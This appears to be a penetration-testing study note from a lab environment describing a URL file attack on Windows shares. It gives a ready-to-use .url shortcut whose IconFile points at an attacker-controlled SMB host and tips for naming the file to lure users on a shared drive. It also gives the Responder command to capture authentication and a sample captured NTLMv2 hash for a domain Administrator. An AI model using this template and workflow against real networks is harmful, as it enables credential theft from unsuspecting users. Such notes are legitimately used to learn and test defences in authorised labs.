URL File Attacks

Tips:

Social engineering! Use:

Microsoft Word
Outlook/Email
Get people to open a file or certain things to get a hash back to you in Responder

Create an intriguing file in shared drive:

[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\192.168.218.128\%USERNAME%.icon #Kali IP
IconIndex=1

Important things when saving it:

Needs @ or ~ and .url and in quotes

Example: “@test.url”

Intriguing is:

naming it relevant to the directory it’s in

Open Responder:

sudo responder -I eth0 -v

When the user visits the folder, you get a hash dump

[SMB] NTLMv2-SSP Client   : 192.168.218.139
[SMB] NTLMv2-SSP Username : MARVEL\Administrator
[SMB] NTLMv2-SSP Hash     : Administrator::MARVEL:8dff599c46d4e7e8:F7C0FC1E035FB1F8A3F6341A9D9809A0:010100000000000080F962AC67F7D901FA44898A2BBC2EA000000000020008004C0035005800430001001E00570049004E002D005200420059005100410056004400590033004100390004003400570049004E002D00520042005900510041005600440059003300410039002E004C003500580043002E004C004F00430041004C00030014004C003500580043002E004C004F00430041004C00050014004C003500580043002E004C004F00430041004C000700080080F962AC67F7D90106000400020000000800300030000000000000000000000000300000C2B79F242DD166CF328444A723066C6FF77F31237F59B11C034338CB070266F00A001000000000000000000000000000000000000900280063006900660073002F003100390032002E003100360038002E003200310038002E003100320038000000000000000000